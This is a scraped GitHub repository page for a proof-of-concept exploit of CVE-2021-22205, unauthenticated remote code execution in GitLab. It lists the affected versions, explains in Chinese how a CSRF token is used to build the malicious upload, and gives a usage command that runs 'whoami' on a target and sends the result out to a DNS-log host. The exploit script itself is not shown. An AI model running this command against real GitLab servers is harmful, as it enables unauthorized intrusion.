code-scan starred CVE-2021-22205

code-scan starred CVE-2021-22205
2021-10-29 05:33:48 Author: github.com(查看原文) 阅读量:140 收藏

1 branch 0 tags

Code

Latest commit

r0eXpeR Update README.md

Update README.md

32b2162

Git stats

5 commits

Files

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

media/16354286989629

Oct 28, 2021

CVE-2021-22205.py

Oct 28, 2021

Update README.md

Oct 28, 2021

Oct 28, 2021

README.md

影响版本：

Gitlab CE/EE < 13.10.3
Gitlab CE/EE < 13.9.6
Gitlab CE/EE < 13.8.8

Usage

python3 CVE-2021-22205.py target "curl \`whoami\`.dnslog"

获取csrf-token：

通过 /users/sign_in 获取csrf-token 然后使用前面的 CVE-2021-22205 poc 进行构造上传包进行执行未经身份验证的上传请求，最终rce

ref:

About

CVE-2021-22205 Unauthorized RCE

Resources

Releases

No releases published

Packages

No packages published

Languages

Python 100.0%

文章来源: https://github.com/r0eXpeR/CVE-2021-22205
如有侵权请联系:admin#unsafe.sh